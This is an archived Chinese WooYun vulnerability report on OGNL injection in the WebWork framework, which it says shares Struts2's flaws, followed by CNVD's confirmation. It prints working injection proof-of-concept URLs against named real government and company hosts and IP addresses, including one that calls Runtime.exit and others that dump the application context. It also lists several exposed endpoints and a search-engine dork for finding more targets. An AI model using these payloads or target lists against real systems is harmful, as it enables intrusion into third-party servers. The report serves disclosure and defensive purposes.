乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-13: 细节已通知厂商并且等待厂商处理中 2013-08-17: 厂商已经确认,细节仅向厂商公开 2013-08-20: 细节向第三方安全合作伙伴开放 2013-10-11: 细节向核心白帽子及相关领域专家公开 2013-10-21: 细节向普通白帽子公开 2013-10-31: 细节向实习白帽子公开 2013-11-11: 细节向公众公开
RT!
webWork是建立在称为XWork的Command模式框架之上的强大的基于Web的MVC框架。详细见百科:http://baike.baidu.com/view/25660.htm 作为j2ee史上一个重要而强大的MVC框架,当struts1框架走到尽头时,是它充当了struts1到struts2过度时期的替代品,从strust2选择与webWork合并时,复用其大量核心代码及结构不难看出它的强大!
由于struts2大量保留webWork的一些功能及特性,所以struts2非自身添加的新功能或特性漏洞的地方,webWork同样存在!只是写PoC及exp时要读一下webWork的源代码!
比如:2010年7月,我们熟悉的struts2漏洞PoC:http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1再比如:最近这个s016,struts2漏洞PoC:http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}http://pmo.cfischina.com/rdms/satisfyaid/actions/cstContactAction!register.action
当然,webWork使用范围肯定不只这么点广:比如:上海漫索计算机科技有限公司的大量应用及他们的产品Mainsoft就大量使用webWork框架:http://www.mansuo.com/home/index.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
Mainsoft软件用户列表:http://www.mansuo.com/home/newsList.action?typeIds=2
本身如果部署在内网,还可以缓解一下危害,但有些还是部署在外网。比如google key:intitle:集成化研发管理平台登录页面
本身就算部署在外网,没有进入webWork框架流程的url,也是没用的(好象是struts1及webWork混合在用)。但找到了一个开启了外部webWrok实现的注册功能:http://114.242.194.148/rdms/satisfyaid/actions/cstContactAction!register.actionhttp://pmo.cfischina.com/rdms/satisfyaid/actions/cstContactAction!register.actionhttp://218.85.36.216:8085/rdms/satisfyaid/actions/cstContactAction!register.actionhttp://center.ylzinfo.com:8085/rdms/satisfyaid/actions/cstContactAction!register.actionhttp://rdms.mansuo.com/rdms/satisfyaid/actions/cstContactAction!register.actionhttp://service.epsoft.com.cn/rdms/satisfyaid/actions/cstContactAction!register.actionhttp://116.228.221.108:22480/rdms/satisfyaid/actions/cstContactAction!register.action。。。。
ps:// 因为不会再有补丁,命令执行及写入webShell的exp和寻找目标的方法,肯定不能说!如果你真的有心(虽然它的很多特征与struts2相同),但熟悉后就很容易了!比如,其中一个PoC的对比,我只轻轻改一个地方:struts2:
?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22struts2Bug-67c2c13e9cc0c312973c90245537fd04%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
webWork:
?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22webWorkBug-9de3deb185db08ab775d3fa8ad6aed8e%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
问问官方怎么说!
危害等级:高
漏洞Rank:14
确认时间:2013-08-17 21:44
CNVD确认并复现所述情况,利用代码与struts2 类似,其实就改成struts1即可。已经在多个实例上复现,不过对于应用该框架的应用软件,暂未找到很好的远程盲检方法。rank 14
暂无
